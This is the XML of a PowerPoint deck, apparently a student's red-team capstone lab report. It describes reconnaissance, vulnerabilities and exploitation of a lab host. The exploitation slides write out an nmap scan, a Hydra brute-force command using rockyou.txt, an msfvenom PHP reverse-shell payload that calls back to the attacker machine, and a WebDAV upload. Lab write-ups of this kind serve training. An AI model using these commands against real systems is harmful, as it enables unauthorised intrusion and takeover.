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24415-D84C-354F-80FA-5FB2E30CBD09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FAEDC-5979-094C-A7FA-0AD40EF14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36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42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47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12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8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15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16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66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B5C3-ACA7-D247-B254-D62B4A9B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C3FEE-976C-D742-8039-A9A0BB9CB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54B3A-02AE-E340-8F7A-6548BCE9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AF6B4-83C2-3543-8C90-D6F28F46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23676-6F76-3048-BE9A-1F8AAD77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2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D6FC-D8DB-844E-9ABB-D9D0B0BC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CCA36-7340-7D41-A9AC-F3B1A675C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8574-DF69-4A41-8CAD-73723B48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46918-A8F1-2142-B1CC-FBD18F00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59E-3DF8-5949-970B-811F76665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0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5CACF-6814-AD4C-9D09-AA86C57D5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03A7F-57E4-884D-929C-9A0F302EA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BEB81-496B-704F-987C-FFBD43ED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4B878-215C-BE4C-B0A1-7117A9D8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6F704-1758-874E-8537-895048B6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6. Transition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316133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93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3" name="Google Shape;63;p8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6238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3567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8. Text with Sideba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9398600" y="1213700"/>
            <a:ext cx="2438400" cy="5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6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800" cy="5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800" cy="50464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3" name="Google Shape;73;p9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73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C821-19C1-0344-9FE7-6CECB3DA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69EFD-FEDF-C944-969B-DBF614D89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CC0BC-4AAB-9742-975A-02043097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FE693-A7EF-1E46-A2E6-65BA4A45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A39E-96E9-9744-9B9C-CA14E364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B852-5C99-1345-9B98-DA150FB0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73464-ABD2-4F4C-91D6-0B8F3CAFC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425AC-3AB1-9E45-954F-ACD86722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DA81F-071A-574B-BF1A-7831B650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4221C-A801-E441-9C86-3B8B7F17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8DE2-AE8D-B14F-8A51-70EE141A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C6847-9E51-624C-BB15-12343556E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5749-8278-AE43-AF1B-77F516BCD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4B74F-CF1F-5C4D-B7D3-E0467A7B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C5F7B-3FB8-2641-83B2-D7AF58F8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B939D-CAE8-1E4B-B5DD-8A7657E8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0AAD-1764-CD49-A6E7-93799331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7F57-5C26-2746-A994-EC066F862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8D564-E439-4C47-A9F2-6A3A38C56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D92BF-A283-7440-BA47-FABA0DD52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63D5B1-172C-4848-81F7-50363C1E7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3AF048-ED25-EE43-BB29-9B7408C8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D8446B-8E01-4043-A546-50027CBA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0DFC3-2951-C449-9F32-877B6C7E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2050-409C-744D-8F05-919D9FB7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5FE36-880B-9A45-8898-F2B41379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41D40-4604-B84E-BD4A-49821513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7C0D9-DA8B-B441-ACFB-47CF5195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8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C463B-5115-9147-BEDF-BACBD3F5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971BE-71FA-6C49-A101-E6B1143D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D8E49-37FE-5548-B5EE-97299AD1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2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4E27-586A-9942-B0D0-7314CBF1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2AC1-DFC3-7E48-B99E-153F9D80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06A2B-9B55-9145-812B-CF1435EBC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16352-0C7A-F74D-8EE4-63FC86BA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250F5-93DD-BD40-8D8D-17B862C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219B6-F327-124A-9D42-70019AF6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4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0736-420E-B744-A937-6CA9303F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A4EA2-C09D-C642-87F1-6CC2DB95D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48EC5-694D-A142-8858-40DD62798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DDB9E-794D-2242-A9EB-C9D0C440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69DF1-3510-9740-B4F8-D5A69875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F909B-5470-FD44-A210-1510F966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3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F00DD-9E0E-684F-A188-DCD70634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AB06A-C220-6745-998E-6F896C94C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69FF-C52D-EC40-94DE-078F744CD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BA9B3-5176-904A-8DA8-446D9DDEC78C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2EB5-3516-0D48-B04B-388D48701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5F87-DC42-894C-882D-43ECE8E5D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B2EF9-6C4C-1E47-96D4-6BB1B0474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365800" y="2271900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Capstone Engagement</a:t>
            </a:r>
            <a:endParaRPr sz="4133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4133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4133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br>
              <a:rPr lang="en" sz="1867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867" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Reported by Dmitry Baimakov on the 14</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1867" baseline="30000" dirty="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67" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t> of November, 2021</a:t>
            </a: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endParaRPr sz="41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val="316640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Exploitation: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Msfvenom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Msfconsole</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> and SSH</a:t>
            </a:r>
            <a:endParaRPr b="1"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407762" y="1118000"/>
            <a:ext cx="4655017" cy="543753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4" name="Google Shape;1134;p63"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="407762" y="851514"/>
            <a:ext cx="4355383" cy="570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333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>
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
            </a:pP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From the previous steps I already had access to the /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folder. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
            </a:pP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1. First was to create a reverse shell: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 –p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php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reverse_tcp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lhost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=192.168.1.90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lport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=4444 –f raw –o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>
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
            </a:pP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2. Then using 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cadaver 192.168.1.105/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I accessed the folder then using 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put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I uploaded the file (this step could have also been used using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linux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GUI of the  file manager as well)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
            </a:pP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3. Now I have to setup the payload using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, by using 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multi/handler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, setting local host of my kali machine, setting open port and setting the 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php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" sz="1333" b="1" dirty="0" err="1">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>reverse_tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1333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payload. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-CA" sz="1333" dirty="0"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I also can simply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into the system because port 22 is open and I know Ryan’s credentials. (Using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is bit more cunning as it is harder to spot in logs but still can be flagged by preset “Alarms” in Kibana)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333" u="sng" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Achievements </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
            </a:pP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By gaining the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shell, or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1333" dirty="0" err="1">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>SSHing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1333" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t> into the 192.168.1.105 I gain full control of the system and can now use the command line to do as I please</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr sz="1333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80344-1CB7-494D-A18E-11E4D8B0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9" y="851513"/>
            <a:ext cx="4216831" cy="171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D233A-86EA-2D41-BD86-9DA0B99E9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778" y="2564330"/>
            <a:ext cx="5540165" cy="1837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10EE32-90BD-6043-A806-0B57656B2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777" y="4107093"/>
            <a:ext cx="3448828" cy="24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803400" y="1838433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609601" y="1838417"/>
            <a:ext cx="1035852" cy="8284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609601" y="2971633"/>
            <a:ext cx="1035852" cy="8284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609601" y="4098467"/>
            <a:ext cx="1035852" cy="8284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609601" y="5231667"/>
            <a:ext cx="1035852" cy="8284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6600" y="1838433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803400" y="2974848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2" name="Google Shape;1042;p55"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1803400" y="4098467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3" name="Google Shape;1043;p55"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1803400" y="5225300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4" name="Google Shape;1044;p55"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-16567" y="2978067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200" y="4101700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6400" y="5225300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5924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Network Topology </a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1052" name="Google Shape;1052;p56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3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27174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53833" y="1213967"/>
            <a:ext cx="8932800" cy="51968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vert="horz" wrap="square" lIns="609600" tIns="0" rIns="609600" bIns="1219200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535627" cy="5046400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" vert="horz" wrap="square" lIns="243833" tIns="243833" rIns="243833" bIns="243833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16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600"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Address Range: 192.168.1.0/24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Netmask: 255.255.25..0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Gateway: 192.168.1.1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endParaRPr sz="1600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sz="1600" dirty="0">
                <a:latin typeface="Roboto Black"/>
                <a:ea typeface="Roboto Black"/>
                <a:cs typeface="Roboto Black"/>
                <a:sym typeface="Roboto Black"/>
              </a:rPr>
              <a:t>Machines:</a:t>
            </a:r>
            <a:endParaRPr sz="16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IPv4: 192.168.1.90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OS: Linux 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Hostname: Kali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IPv4: 192.168.1.105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OS: Linux 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Hostname: Capstone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IPv4: 192.168.1.100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OS: Linux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Hostname: ELK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IPv4: 192.168.1.1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OS: Windows 10 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b="1" dirty="0"/>
              <a:t>Hostname: Azure Hyper-V</a:t>
            </a:r>
            <a:endParaRPr b="1" dirty="0"/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/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B61630-F6A4-2449-97F8-916EAA503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6" y="1213967"/>
            <a:ext cx="8322695" cy="51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4" y="386533"/>
            <a:ext cx="11460393" cy="61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5</a:t>
            </a:fld>
            <a:endParaRPr sz="8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365767" y="2468133"/>
            <a:ext cx="11460400" cy="137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/>
              <a:t>Red Team</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100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val="411138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dirty="0"/>
              <a:t>Recon: Describing the Target</a:t>
            </a:r>
            <a:endParaRPr dirty="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graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="1076" name="Google Shape;1076;p59"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr>
            <p:extLst/>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="559733" y="1598334"/>
          <a:ext cx="11128800" cy="4769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Azure Machine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 Based Host Machine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Networking Monitoring VM running Kibana logs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65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dirty="0"/>
              <a:t>Vulnerability Assessment</a:t>
            </a:r>
            <a:endParaRPr dirty="0"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graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="1084" name="Google Shape;1084;p60"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr>
            <p:extLst/>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="622867" y="1602534"/>
          <a:ext cx="11150000" cy="48185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1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 with public access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</a:t>
                      </a:r>
                      <a:endParaRPr sz="1600" b="1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for anyone using port 80</a:t>
                      </a:r>
                      <a:endParaRPr sz="1600" b="1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Folders and files are readily </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-CA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</a:t>
                      </a:r>
                      <a:endParaRPr sz="1600" b="1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CVE-2019-3746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attempts to gain access with a script that tries numerous combinations using a password list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password lists like </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en" sz="16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rockyou.txt</a:t>
                      </a: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by scripts such as ”John the Ripper”, “Hydra”, “Medusa” etc.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Indexing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view and download content of a directory located on a vulnerable device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and confidential data exposure. System security breach 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WebDAV on a server or using Shell access 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configurations are lacking - this allows hackers to remotely edit website’s content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66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lvl="0" algn="ctr"/>
            <a:r>
              <a:rPr lang="en" b="1" dirty="0"/>
              <a:t>Exploitation of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" b="1" dirty="0" err="1"/>
              <a:t>nMap</a:t>
            </a:r>
            <a:endParaRPr b="1"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091" name="Google Shape;1091;p61"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="647799" y="1087367"/>
            <a:ext cx="3560851" cy="546816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2" name="Google Shape;1092;p61"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="931906" y="1319817"/>
            <a:ext cx="3132740" cy="481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u="sng" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Tools &amp; Processes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Using aggressive </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="16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 scan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sV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sC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sS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sU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–A 192.168.1.105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I found out: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1. Types of ports are open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2. What services are running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3. Various critical paths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en-CA" sz="1600" u="sng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u="sng" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Achievements 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All of the above can be used in order to gain further access.  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Port 22 can be used to SSH</a:t>
            </a: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 into a user, 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port 80 can be used to upload malicious files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9" name="Google Shape;1099;p61"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="46614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61"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4661400" y="1974167"/>
            <a:ext cx="3238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/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="8534900" y="1975100"/>
            <a:ext cx="3238000" cy="4336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5" name="Google Shape;1105;p61"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8480025" y="1798715"/>
            <a:ext cx="3162000" cy="4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127D8-1064-F24D-9A1A-FC2C68EB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5" y="954091"/>
            <a:ext cx="7674460" cy="51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5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Exploitation using the Brute Force</a:t>
            </a:r>
            <a:endParaRPr b="1"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595247" y="971876"/>
            <a:ext cx="4250556" cy="539574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3" name="Google Shape;1113;p62"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="671595" y="902577"/>
            <a:ext cx="4566832" cy="528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CA" sz="1600" u="sng" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Tools and Processes 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Using Hydra (preinstalled on Linux) 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and a password list (downloaded) I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ran the command hydra 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–l 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–P </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
            </a:pP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/root/Downloads/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rockyou.txt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–s 80 –f</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
            </a:pP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192.168.1.105 http-get /</a:t>
            </a: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/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-CA" sz="1600" b="1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(Ashton’s name I found out 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CA" sz="1600" dirty="0" err="1">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>nmap’s</a:t>
            </a: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 addresses by going to 192.16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8.1.105/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="16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>
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc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</a:pPr>
            <a:r>
              <a:rPr lang="en-CA" sz="1600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r>
              <a:rPr lang="en-CA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This exploit allowed me to further dive into </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-CA" sz="1600" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>the Company’s directories that are only accessible with the user name and a password</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc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-CA"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E14D5-D716-B84C-88D7-1559536B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49" y="1084881"/>
            <a:ext cx="6880593" cy="4918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2F7EA-663C-4548-AD71-8D624A7F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94" y="5058128"/>
            <a:ext cx="1921609" cy="13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6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Macintosh PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>120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Black</vt:lpstr>
      <vt:lpstr>Roboto Light</vt:lpstr>
      <vt:lpstr>Roboto Medium</vt:lpstr>
      <vt:lpstr>Roboto Thin</vt:lpstr>
      <vt:lpstr>Office Theme</vt:lpstr>
      <vt:lpstr>Capstone Engagement Assessment, Analysis,  and Hardening of a Vulnerable System  Reported by Dmitry Baimakov on the 14th of November, 2021 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 of nMap</vt:lpstr>
      <vt:lpstr>Exploitation using the Brute Force</vt:lpstr>
      <vt:lpstr>Exploitation: Msfvenom, Msfconsole and SSH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  Reported by Dmitry Baimakov on the 14th of November, 2021 </dc:title>
  <dc:creator>Dmitriy Baimakov</dc:creator>
  <cp:lastModifiedBy>Dmitriy Baimakov</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-11-15T01:30:34Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-11-15T01:30:58Z</dcterms:modified>
</cp:coreProperties>
</file>